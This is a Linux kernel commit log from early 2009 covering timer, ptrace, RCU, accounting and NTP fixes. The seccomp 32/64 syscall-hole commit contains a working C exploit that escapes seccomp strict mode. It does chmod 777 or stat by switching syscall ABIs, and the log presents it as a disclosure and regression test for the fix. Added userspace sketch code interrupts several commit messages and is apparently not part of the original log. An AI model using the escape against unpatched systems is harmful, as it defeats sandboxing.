1. 08 Apr, 2009 1 commit
  2. 02 Apr, 2009 1 commit
    • R
      timers: add missing kernel-doc · 633fe795
      Randy Dunlap committed
      Add missing kernel-doc parameter notation and change function
      name to its new name:
      
        Warning(kernel/timer.c:543): No description found for parameter 'name'
        Warning(kernel/timer.c:543): No description found for parameter 'key'
      Signed-off-by: Randy Dunlap <randy.dunlap@oracle.com>
      Cc: akpm <akpm@linux-foundation.org>
      Cc: Johannes Berg <johannes@sipsolutions.net>
      LKML-Reference: <20090401174723.f0bea0eb.randy.dunlap@oracle.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
      633fe795
  3. 24 Mar, 2009 2 commits
    • O
      posix timers: fix RLIMIT_CPU && fork() · 37bebc70
      Oleg Nesterov committed
      See http://bugzilla.kernel.org/show_bug.cgi?id=12911
      
      copy_signal() copies signal->rlim, but RLIMIT_CPU is "lost". Because
      posix_cpu_timers_init_group() sets cputime_expires.prof_exp = 0 and thus
      fastpath_timer_check() returns false unless we have other cpu timers.
      
      This is the minimal fix for 2.6.29 (tested) and 2.6.28. The patch is not
      optimal, we need further cleanups here. With this patch update_rlimit_cpu()
      is not really needed, but I don't think it should be removed.
      
      The proper fix (I think) is:
      
      	- set_process_cpu_timer() should just start the cputimer->running
      	  logic (it does), no need to change cputime_expires.xxx_exp
      
      	- posix_cpu_timers_init_group() should set ->running when needed
      
      	- fastpath_timer_check() can check ->running instead of
      	  task_cputime_zero(signal->cputime_expires)
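
The failure mode above can be modelled in userspace. This is only a sketch, not the kernel code: every `sketch_` name is hypothetical, and the "seeded" init is an assumption about what a fix could look like (seed the profiling expiry from a finite CPU limit), not a copy of the patch.

```c
#include <stdbool.h>
#include <stdint.h>

#define SKETCH_RLIM_INFINITY UINT64_MAX	/* hypothetical "no limit" marker */

/* Hypothetical model of the per-process expiry cache. */
struct sketch_expires {
	uint64_t prof_exp;
	uint64_t virt_exp;
	uint64_t sched_exp;
};

/* Models the lossy init: every expiry is cleared and the limit is ignored. */
void sketch_init_group_lossy(struct sketch_expires *e, uint64_t rlim_cpu_secs)
{
	(void)rlim_cpu_secs;
	e->prof_exp = 0;
	e->virt_exp = 0;
	e->sched_exp = 0;
}

/* Assumed fix: seed prof_exp from a finite CPU limit. */
void sketch_init_group_seeded(struct sketch_expires *e, uint64_t rlim_cpu_secs)
{
	e->virt_exp = 0;
	e->sched_exp = 0;
	e->prof_exp = (rlim_cpu_secs == SKETCH_RLIM_INFINITY) ? 0 : rlim_cpu_secs;
}

/* Fast path: there is timer work only if some expiry is non-zero. */
bool sketch_fastpath_check(const struct sketch_expires *e)
{
	return e->prof_exp != 0 || e->virt_exp != 0 || e->sched_exp != 0;
}
```

With the lossy init the fast path reports no work even though a limit was inherited, which is how the limit gets "lost" in this model.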
      Reported-by: Peter Lojkin <ia6432@inbox.ru>
      Signed-off-by: Oleg Nesterov <oleg@redhat.com>
      Cc: Peter Zijlstra <peterz@infradead.org>
      Cc: Roland McGrath <roland@redhat.com>
      Cc: <stable@kernel.org> [for 2.6.29.x]
      LKML-Reference: <20090323193411.GA17514@redhat.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
      37bebc70
    • M
      fix ptrace slowness · 53da1d94
      Miklos Szeredi committed
      This patch fixes bug #12208:
      
        Bug-Entry       : http://bugzilla.kernel.org/show_bug.cgi?id=12208
        Subject         : uml is very slow on 2.6.28 host
      
      This turned out to be not a scheduler regression, but an already
      existing problem in ptrace being triggered by subtle scheduler
      changes.
      
      The problem is this:
      
       - task A is ptracing task B
       - task B stops on a trace event
       - task A is woken up and preempts task B
       - task A calls ptrace on task B, which does ptrace_check_attach()
       - this calls wait_task_inactive(), which sees that task B is still on the runq
       - task A goes to sleep for a jiffy
       - ...
      
      Since UML does lots of the above sequences, those jiffies quickly add
      up to make it slow as hell.
      
      This patch solves this by not rescheduling in read_unlock() after
      ptrace_stop() has woken up the tracer.
      
      Thanks to Oleg Nesterov and Ingo Molnar for the feedback.
      Signed-off-by: Miklos Szeredi <mszeredi@suse.cz>
      CC: stable@kernel.org
      Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
      53da1d94
  4. 18 Mar, 2009 1 commit
  5. 11 Mar, 2009 1 commit
  6. 10 Mar, 2009 1 commit
  7. 09 Mar, 2009 1 commit
    • H
      Fix fixpoint divide exception in acct_update_integrals · 6d5b5acc
      Heiko Carstens committed
      Frans Pop reported the crash below when running an s390 kernel under Hercules:
      
        Kernel BUG at 000738b4  verbose debug info unavailable!
        fixpoint divide exception: 0009 [#1] SMP
        Modules linked in: nfs lockd nfs_acl sunrpc ctcm fsm tape_34xx
           cu3088 tape ccwgroup tape_class ext3 jbd mbcache dm_mirror dm_log dm_snapshot
           dm_mod dasd_eckd_mod dasd_mod
        CPU: 0 Not tainted 2.6.27.19 #13
        Process awk (pid: 2069, task: 0f9ed9b8, ksp: 0f4f7d18)
        Krnl PSW : 070c1000 800738b4 (acct_update_integrals+0x4c/0x118)
                   R:0 T:1 IO:1 EX:1 Key:0 M:1 W:0 P:0 AS:0 CC:1 PM:0
        Krnl GPRS: 00000000 000007d0 7fffffff fffff830
                   00000000 ffffffff 00000002 0f9ed9b8
                   00000000 00008ca0 00000000 0f9ed9b8
                   0f9edda4 8007386e 0f4f7ec8 0f4f7e98
        Krnl Code: 800738aa: a71807d0         lhi     %r1,2000
                   800738ae: 8c200001         srdl    %r2,1
                   800738b2: 1d21             dr      %r2,%r1
                  >800738b4: 5810d10e         l       %r1,270(%r13)
                   800738b8: 1823             lr      %r2,%r3
                   800738ba: 4130f060         la      %r3,96(%r15)
                   800738be: 0de1             basr    %r14,%r1
                   800738c0: 5800f060         l       %r0,96(%r15)
        Call Trace:
        ([<000000000004fdea>] blocking_notifier_call_chain+0x1e/0x2c)
         [<0000000000038502>] do_exit+0x106/0x7c0
         [<0000000000038c36>] do_group_exit+0x7a/0xb4
         [<0000000000038c8e>] SyS_exit_group+0x1e/0x30
         [<0000000000021c28>] sysc_do_restart+0x12/0x16
         [<0000000077e7e924>] 0x77e7e924
      
      Reason for this is that cpu time accounting usually only happens from
      interrupt context, but acct_update_integrals gets also called from
      process context with interrupts enabled.
      
      So in acct_update_integrals we may end up with the following scenario:
      
      Between reading tsk->stime/tsk->utime and tsk->acct_timexpd an interrupt
      happens which updates accounting values.  This causes acct_timexpd to be
      greater than the former stime + utime.  The subsequent calculation of
      
      	dtime = cputime_sub(time, tsk->acct_timexpd);
      
      will be negative and the division performed by
      
      	cputime_to_jiffies(dtime)
      
      will generate an exception since the result won't fit into a 32 bit
      register.
      
      In order to fix this just always disable interrupts while accessing any
      of the accounting values.
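
A simplified userspace model of the torn read described above, as a sketch only. The struct and the `sketch_` helpers are hypothetical; the model uses unsigned 64-bit values and a plain range check in place of the real s390 divide instruction, and the divisor 2000 is taken from the `lhi %r1,2000` line in the oops.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical stand-in for the task fields named in the commit message. */
struct sketch_acct {
	uint64_t utime;
	uint64_t stime;
	uint64_t acct_timexpd;
};

/*
 * Delta as computed without protection: if acct_timexpd was read after an
 * interrupt advanced it, the subtraction wraps around to a huge value.
 */
uint64_t sketch_delta(const struct sketch_acct *s)
{
	return (s->utime + s->stime) - s->acct_timexpd;
}

/* True when delta / divisor still fits in a 32-bit quotient. */
bool sketch_quotient_fits_u32(uint64_t delta, uint32_t divisor)
{
	return divisor != 0 && delta / divisor <= UINT32_MAX;
}
```

A consistent snapshot gives a small delta whose quotient fits; a torn snapshot, where `acct_timexpd` is newer than `utime + stime`, does not, which corresponds to the exception in the report.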
      
      Reported by: Frans Pop <elendil@planet.nl>
      Tested by: Frans Pop <elendil@planet.nl>
      Cc: stable@kernel.org
      Cc: Martin Schwidefsky <schwidefsky@de.ibm.com>
      Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com>
      Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
      6d5b5acc
  8. 05 Mar, 2009 1 commit
  9. 03 Mar, 2009 1 commit
    • R
      x86-64: seccomp: fix 32/64 syscall hole · 5b101740
      Roland McGrath committed
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process can make a 32-bit system call with int $0x80.
      
      In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
      the wrong system call number table.  The fix is simple: test TS_COMPAT
      instead of TIF_IA32.  Here is an example exploit:
      
      	/* test case for seccomp circumvention on x86-64
      
      	   There are two failure modes: compile with -m64 or compile with -m32.
      
      	   The -m64 case is the worst one, because it does "chmod 777 ." (could
      	   be any chmod call).  The -m32 case demonstrates it was able to do
      	   stat(), which can glean information but not harm anything directly.
      
      	   A buggy kernel will let the test do something, print, and exit 1; a
      	   fixed kernel will make it exit with SIGKILL before it does anything.
      	*/
      
      	#define _GNU_SOURCE
      	#include <assert.h>
      	#include <inttypes.h>
      	#include <stdio.h>
      	#include <linux/prctl.h>
      	#include <sys/stat.h>
      	#include <unistd.h>
      	#include <asm/unistd.h>
      
      	int
      	main (int argc, char **argv)
      	{
      	  char buf[100];
      	  static const char dot[] = ".";
      	  long ret;
      	  unsigned st[24];
      
      	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
      	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
      
      	#ifdef __x86_64__
      	  assert ((uintptr_t) dot < (1UL << 32));
      	  asm ("int $0x80 # %0 <- %1(%2 %3)"
      	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      	  ret = snprintf (buf, sizeof buf,
      			  "result %ld (check mode on .!)\n", ret);
      	#elif defined __i386__
      	  asm (".code32\n"
      	       "pushl %%cs\n"
      	       "pushl $2f\n"
      	       "ljmpl $0x33, $1f\n"
      	       ".code64\n"
      	       "1: syscall # %0 <- %1(%2 %3)\n"
      	       "lretl\n"
      	       ".code32\n"
      	       "2:"
      	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      	  if (ret == 0)
      	    ret = snprintf (buf, sizeof buf,
      			    "stat . -> st_uid=%u\n", st[7]);
      	  else
      	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
      	#else
      	# error "not this one"
      	#endif
      
      	  write (1, buf, ret);
      
      	  syscall (__NR_exit, 1);
      	  return 2;
      	}
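
Why the wrong table matters can be shown with a small userspace model. This is a sketch under stated assumptions, not the kernel's secure_computing(): the struct and `sketch_` functions are hypothetical, and the two allow lists hold the x86 numbers for read, write, exit and (rt_)sigreturn in each ABI.

```c
#include <stdbool.h>
#include <stddef.h>

/* Strict-mode allow lists: read, write, exit, (rt_)sigreturn. */
static const int sketch_allowed_64[] = { 0, 1, 60, 15 };
static const int sketch_allowed_32[] = { 3, 4, 1, 119 };

/* Hypothetical description of one system call entry. */
struct sketch_call {
	bool task_is_32bit;	/* per-task property (models TIF_IA32) */
	bool entry_is_32bit;	/* per-call property (models TS_COMPAT) */
	int  nr;		/* system call number as passed by the caller */
};

static bool sketch_in_table(const int *table, size_t n, int nr)
{
	for (size_t i = 0; i < n; i++)
		if (table[i] == nr)
			return true;
	return false;
}

/* Buggy model: the table is chosen from the task's personality. */
bool sketch_allowed_buggy(const struct sketch_call *c)
{
	return c->task_is_32bit
		? sketch_in_table(sketch_allowed_32, 4, c->nr)
		: sketch_in_table(sketch_allowed_64, 4, c->nr);
}

/* Fixed model: the table is chosen from how this call entered the kernel. */
bool sketch_allowed_fixed(const struct sketch_call *c)
{
	return c->entry_is_32bit
		? sketch_in_table(sketch_allowed_32, 4, c->nr)
		: sketch_in_table(sketch_allowed_64, 4, c->nr);
}
```

In this model the -m64 test case is `{ false, true, 15 }`: number 15 is rt_sigreturn in the 64-bit list but chmod in the 32-bit ABI, so the buggy check passes it and the fixed check rejects it. The -m32 case is `{ true, false, 4 }`: write in the 32-bit list, stat in the 64-bit ABI.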
      Signed-off-by: Roland McGrath <roland@redhat.com>
      [ I don't know if anybody actually uses seccomp, but it's enabled in
        at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
      Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
      5b101740
  10. 28 Feb, 2009 1 commit
  11. 27 Feb, 2009 2 commits
  12. 26 Feb, 2009 16 commits
    • H
      sched_rt: don't start timer when rt bandwidth disabled · cac64d00
      Hiroshi Shimamoto committed
      Impact: fix incorrect condition check
      
      No need to start rt bandwidth timer when rt bandwidth is disabled.
      If this timer starts, it may stop at sched_rt_period_timer() on the first time.
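
A minimal sketch of the intended guard, written as a standalone predicate. The function name and the "unlimited runtime" marker are hypothetical, and treating an unlimited runtime as a second reason not to start the timer is an assumption, not something this message states.

```c
#include <stdbool.h>
#include <stdint.h>

#define SKETCH_RUNTIME_INF UINT64_MAX	/* hypothetical "unlimited runtime" marker */

/* Decide whether the period timer needs to be started at all. */
bool sketch_should_start_rt_timer(bool bandwidth_enabled, uint64_t rt_runtime)
{
	/* Nothing to enforce when bandwidth control is off. */
	if (!bandwidth_enabled)
		return false;
	/* Assumption: an unlimited runtime never needs throttling either. */
	if (rt_runtime == SKETCH_RUNTIME_INF)
		return false;
	return true;
}
```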
      Signed-off-by: Hiroshi Shimamoto <h-shimamoto@ct.jp.nec.com>
      Acked-by: Peter Zijlstra <a.p.zijlstra@chello.nl>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
      cac64d00
    • P
      rcu: Teach RCU that idle task is not quiescent state at boot · a6826048
      Paul E. McKenney committed
      This patch fixes a bug located by Vegard Nossum with the aid of
      kmemcheck, updated based on review comments from Nick Piggin,
      Ingo Molnar, and Andrew Morton.  And cleans up the variable-name
      and function-name language.  ;-)
      
      The boot CPU runs in the context of its idle thread during boot-up.
      During this time, idle_cpu(0) will always return nonzero, which will
      fool Classic and Hierarchical RCU into deciding that a large chunk of
      the boot-up sequence is a big long quiescent state.  This in turn causes
      RCU to prematurely end grace periods during this time.
      
      This patch changes the rcutree.c and rcuclassic.c rcu_check_callbacks()
      function to ignore the idle task as a quiescent state until the
      system has started up the scheduler in rest_init(), introducing a
      new non-API function rcu_idle_now_means_idle() to inform RCU of this
      transition.  RCU maintains an internal rcu_idle_cpu_truthful variable
      to track this state, which is then used by rcu_check_callbacks() to
      determine if it should believe idle_cpu().
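
The gating described above can be sketched as a tiny state machine. This is a userspace model, not the patch: `rcu_idle_now_means_idle()` and `rcu_idle_cpu_truthful` are the names given in this message, while `sketch_idle_is_quiescent()` and the boolean argument standing in for idle_cpu() are hypothetical.

```c
#include <stdbool.h>

/* False during early boot, when the boot CPU only looks idle. */
static bool rcu_idle_cpu_truthful;

/* Called once the scheduler is up: idle now really means idle. */
void rcu_idle_now_means_idle(void)
{
	rcu_idle_cpu_truthful = true;
}

/*
 * Hypothetical helper: should an idle CPU be counted as being in a
 * quiescent state?  cpu_looks_idle models the result of idle_cpu().
 */
bool sketch_idle_is_quiescent(bool cpu_looks_idle)
{
	return rcu_idle_cpu_truthful && cpu_looks_idle;
}
```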
      
      Because this patch has the effect of disallowing RCU grace periods
      during long stretches of the boot-up sequence, this patch also introduces
      Josh Triplett's UP-only optimization that makes synchronize_rcu() be a
      no-op if num_online_cpus() returns 1.  This allows boot-time code that
      calls synchronize_rcu() to proceed normally.  Note, however, that RCU
      callbacks registered by call_rcu() will likely queue up until later in
      the boot sequence.  Although rcuclassic and rcutree can also use this
      same optimization after boot completes, rcupreempt must restrict its
      use of this optimization to the portion of the boot sequence before the
      scheduler starts up, given that an rcupreempt RCU read-side critical
      section may be preempted.
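
The two flavors of the single-CPU shortcut can be sketched as predicates. The function names and parameters below are hypothetical; they only model the rule stated in this message, with the online CPU count and the scheduler state passed in explicitly.

```c
#include <stdbool.h>

/*
 * Classic/tree model: with one CPU online, a blocking call is itself
 * a grace period, both during and after boot.
 */
bool sketch_blocking_is_gp_classic(int online_cpus)
{
	return online_cpus == 1;
}

/*
 * Preemptible model: readers can be preempted once the scheduler runs,
 * so the shortcut is only valid before the scheduler has started.
 */
bool sketch_blocking_is_gp_preempt(int online_cpus, bool scheduler_running)
{
	return online_cpus == 1 && !scheduler_running;
}
```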
      
      In addition, this patch takes Nick Piggin's suggestion to make the
      system_state global variable be __read_mostly.
      
      Changes since v4:
      
      o	Changes the name of the introduced function and variable to
      	be less emotional.  ;-)
      
      Changes since v3:
      
      o	WARN_ON(nr_context_switches() > 0) to verify that RCU
      	switches out of boot-time mode before the first context
      	switch, as suggested by Nick Piggin.
      
      Changes since v2:
      
      o	Created rcu_blocking_is_gp() internal-to-RCU API that
      	determines whether a call to synchronize_rcu() is itself
      	a grace period.
      
      o	The definition of rcu_blocking_is_gp() for rcuclassic and
      	rcutree checks to see if but a single CPU is online.
      
      o	The definition of rcu_blocking_is_gp() for rcupreempt
      	checks to see both if but a single CPU is online and if
      	the system is still in early boot.
      
      	This allows rcupreempt to again work correctly if running
      	on a single CPU after booting is complete.
      
      o	Added check to rcupreempt's synchronize_sched() for there
      	being but one online CPU.
      
      Tested all three variants both SMP and !SMP, booted fine, passed a short
      rcutorture test on both x86 and Power.
      Located-by: Vegard Nossum <vegard.nossum@gmail.com>
      Tested-by: Vegard Nossum <vegard.nossum@gmail.com>
      Tested-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com>
      Signed-off-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
      a6826048
    • I
      time: ntp: clean up second_overflow() · 39854fe8
      Ingo Molnar committed
      Impact: cleanup, no functionality changed
      
      The 'time_adj' local variable is named in a very confusing
      way because it almost shadows the 'time_adjust' global
      variable - which is used in this same function.
      
      Rename it to 'delta' - to make them stand apart more clearly.
      
      kernel/time/ntp.o:
      
         text	   data	    bss	    dec	    hex	filename
         2545	    114	    144	   2803	    af3	ntp.o.before
         2545	    114	    144	   2803	    af3	ntp.o.after
      
      md5:
         1bf0b3be564512279ba7cee299d1d2be  ntp.o.before.asm
         1bf0b3be564512279ba7cee299d1d2be  ntp.o.after.asm
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
      39854fe8
    • I
      time: ntp: simplify ntp_tick_adj calculations · 069569e0
      Ingo Molnar committed
      Impact: micro-optimization
      
      Convert the (internal) ntp_tick_adj value we store from unscaled
      units to scaled units. This is a constant that we never modify,
      so scaling it up once during bootup is enough - we don't have to
      do it for every adjustment step.
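
A sketch of the idea with hypothetical names: a fixed-point constant is either scaled on every step or scaled once up front, and both give the same result. The 32-bit shift is an assumption standing in for the kernel's NTP scaling, and multiplication is used instead of a shift so negative values stay well defined in C.

```c
#include <stdint.h>

#define SKETCH_SCALE_SHIFT 32	/* assumed fixed-point shift */

/* Convert an unscaled value to scaled (fixed-point) units. */
int64_t sketch_scale(int64_t unscaled)
{
	return unscaled * ((int64_t)1 << SKETCH_SCALE_SHIFT);
}

/* Before: the unscaled constant is scaled on every adjustment step. */
int64_t sketch_step_before(int64_t base, int64_t tick_adj_unscaled)
{
	return base + sketch_scale(tick_adj_unscaled);
}

/* After: the constant was scaled once at init, so a step is a plain add. */
int64_t sketch_step_after(int64_t base, int64_t tick_adj_scaled)
{
	return base + tick_adj_scaled;
}
```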
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
      069569e0
    • I
      time: ntp: make 64-bit constants more robust · 2b9d1496
      Ingo Molnar committed
      Impact: cleanup, no functionality changed
      
       - make PPM_SCALE an explicit s64 constant, to
         remove (s64) casts from usage sites.
      
      kernel/time/ntp.o:
      
         text	   data	    bss	    dec	    hex	filename
         2536	    114	    136	   2786	    ae2	ntp.o.before
         2536	    114	    136	   2786	    ae2	ntp.o.after
      
      md5:
         40a7728d1188aa18e83e21a81fa7b150  ntp.o.before.asm
         40a7728d1188aa18e83e21a81fa7b150  ntp.o.after.asm
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
      2b9d1496
    • I
      time: ntp: refactor do_adjtimex() some more · e9629165
      Ingo Molnar committed
      Impact: cleanup, no functionality changed
      
      Further simplify do_adjtimex():
      
       - introduce the ntp_start_leap_timer() helper function
       - eliminate the goto adj_done complication
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
      e9629165
    • I
      time: ntp: refactor do_adjtimex() · 80f22571
      Ingo Molnar committed
      Impact: cleanup, no functionality changed
      
      do_adjtimex() is currently a monster function with a maze of
      branches. Refactor the txc->modes setting aspects of it into
      two new helper functions:
      
      	process_adj_status()
      	process_adjtimex_modes()
      
      kernel/time/ntp.o:
      
         text	   data	    bss	    dec	    hex	filename
         2512	    114	    136	   2762	    aca	ntp.o.before
         2512	    114	    136	   2762	    aca	ntp.o.after
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
      80f22571
    • I
      time: ntp: fix bug in ntp_update_offset() & do_adjtimex() · 10dd31a7
      Ingo Molnar committed
      Impact: change (fix) the way the NTP PLL seconds offset is initialized/tracked
      
      Fix a bug and do a micro-optimization:
      
      When PLL is enabled we do not reset time_reftime. If the PLL
      was off for a long time (for example after bootup), this is
      arguably the wrong thing to do.
      
      We already had a hack for the common boot-time case in
      ntp_update_offset(), in form of:
      
      	if (unlikely(time_status & STA_FREQHOLD || time_reftime == 0))
       		secs = 0;
      
      But the update delta should be reset later on too - not just when
      the PLL is enabled for the first time after bootup.
      
      So do it on !STA_PLL -> STA_PLL transitions.
      
      This changes behavior, as previously if ntpd was disabled for
      a long time and we restarted it, we'd run from that last update,
      with a very large delta.
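
The transition rule can be sketched in userspace as follows. The struct and `sketch_` functions are hypothetical and only model the behavior described above; `SKETCH_STA_PLL` uses the same bit value as STA_PLL in `<sys/timex.h>`.

```c
#include <stdint.h>

#define SKETCH_STA_PLL 0x0001	/* same bit value as STA_PLL */

/* Hypothetical model of the two pieces of state involved. */
struct sketch_ntp {
	int     status;		/* models time_status */
	int64_t reftime;	/* models time_reftime, in seconds */
};

/* Apply a new status word; restart the reference time when the PLL turns on. */
void sketch_set_status(struct sketch_ntp *n, int new_status, int64_t now_sec)
{
	if (!(n->status & SKETCH_STA_PLL) && (new_status & SKETCH_STA_PLL))
		n->reftime = now_sec;
	n->status = new_status;
}

/* Seconds since the reference point, as an offset update would see them. */
int64_t sketch_secs_since_ref(const struct sketch_ntp *n, int64_t now_sec)
{
	return now_sec - n->reftime;
}
```

Without the reset, an update shortly after re-enabling the PLL would see the whole time the PLL was off as its delta; with it, the delta starts from the moment of the transition.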
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
      10dd31a7
    • I
      time: ntp: micro-optimize ntp_update_offset() · c7986acb
      Ingo Molnar committed
      Impact: cleanup, no functionality changed
      
      The time_reftime update in ntp_update_offset() to xtime.tv_sec
      is a convoluted way of saying that we want to freeze the frequency
      and want the 'secs' delta to be 0. Also make this branch unlikely.
      
      This shaves off 8 bytes from the code size:
      
         text	   data	    bss	    dec	    hex	filename
         2504	    114	    136	   2754	    ac2	ntp.o.before
         2496	    114	    136	   2746	    aba	ntp.o.after
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
      c7986acb
    • I
      time: ntp: simplify ntp_update_offset_fll() · 478b7aab
      Ingo Molnar committed
      Impact: cleanup, no functionality changed
      
      Change ntp_update_offset_fll() to delta logic instead of
      absolute value logic. This eliminates 'freq_adj' from the
      function.
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
      478b7aab
    • I
      time: ntp: refactor and clean up ntp_update_offset() · f939890b
      Ingo Molnar committed
      Impact: cleanup, no functionality changed
      
      - introduce the ntp_update_offset_fll() helper
      - clean up the flow and variable naming
      
      kernel/time/ntp.o:
      
         text	   data	    bss	    dec	    hex	filename
         2504	    114	    136	   2754	    ac2	ntp.o.before
         2504	    114	    136	   2754	    ac2	ntp.o.after
      
      md5:
         01f7b8e1a5472a3056f9e4ae84d46315  ntp.o.before.asm
         01f7b8e1a5472a3056f9e4ae84d46315  ntp.o.after.asm
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
      f939890b
    • I
      time: ntp: refactor up ntp_update_frequency() · bc26c31d
      Ingo Molnar committed
      Impact: cleanup, no functionality changed
      
      Change ntp_update_frequency() from a hard to follow code
      flow that uses global variables as temporaries, to a clean
      input+output flow.
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
      bc26c31d
    • I
      time: ntp: clean up ntp_update_frequency() · 9ce616aa
      Ingo Molnar committed
      Impact: cleanup, no functionality changed
      
      Prepare a refactoring of ntp_update_frequency().
      
      kernel/time/ntp.o:
      
         text	   data	    bss	    dec	    hex	filename
         2504	    114	    136	   2754	    ac2	ntp.o.before
         2504	    114	    136	   2754	    ac2	ntp.o.after
      
      md5:
         41f3009debc9b397d7394dd77d912f0a  ntp.o.before.asm
         41f3009debc9b397d7394dd77d912f0a  ntp.o.after.asm
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
      9ce616aa
    • I
      time: ntp: simplify the MAX_TICKADJ_SCALED definition · bbd12676
      Ingo Molnar committed
      Impact: cleanup, no functionality changed
      
      There's an ugly u64 typecast in the MAX_TICKADJ_SCALED definition,
      this can be eliminated by making the MAX_TICKADJ constant's type
      64-bit (signed).
      
      kernel/time/ntp.o:
      
         text	   data	    bss	    dec	    hex	filename
         2504	    114	    136	   2754	    ac2	ntp.o.before
         2504	    114	    136	   2754	    ac2	ntp.o.after
      
      md5:
         41f3009debc9b397d7394dd77d912f0a  ntp.o.before.asm
         41f3009debc9b397d7394dd77d912f0a  ntp.o.after.asm
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
      bbd12676
    • I
      time: ntp: simplify the second_overflow() code flow · 3c972c24
      Ingo Molnar committed
      Impact: cleanup, no functionality changed
      
      Instead of a hierarchy of conditions, transform them to clean
      gradual conditions and returns.
      
      This makes the flow easier to read and makes the purpose of
      the function easier to understand.
      
      kernel/time/ntp.o:
      
         text	   data	    bss	    dec	    hex	filename
         2552	    170	    168	   2890	    b4a	ntp.o.before
         2552	    170	    168	   2890	    b4a	ntp.o.after
      
      md5:
         eae1275df0b7d6290c13f6f6f8f05c8c  ntp.o.before.asm
         eae1275df0b7d6290c13f6f6f8f05c8c  ntp.o.after.asm
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
      3c972c24
    • I
      time: ntp: clean up kernel/time/ntp.c · 53bbfa9e
      Ingo Molnar committed
      Impact: cleanup, no functionality changed
      
      Make this file a bit more readable by applying a consistent coding style.
      
      No code changed:
      
      kernel/time/ntp.o:
      
         text	   data	    bss	    dec	    hex	filename
         2552	    170	    168	   2890	    b4a	ntp.o.before
         2552	    170	    168	   2890	    b4a	ntp.o.after
      
      md5:
         eae1275df0b7d6290c13f6f6f8f05c8c  ntp.o.before.asm
         eae1275df0b7d6290c13f6f6f8f05c8c  ntp.o.after.asm
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
      53bbfa9e
  13. 23 Feb, 2009 1 commit
  14. 22 Feb, 2009 5 commits
  15. 19 Feb, 2009 5 commits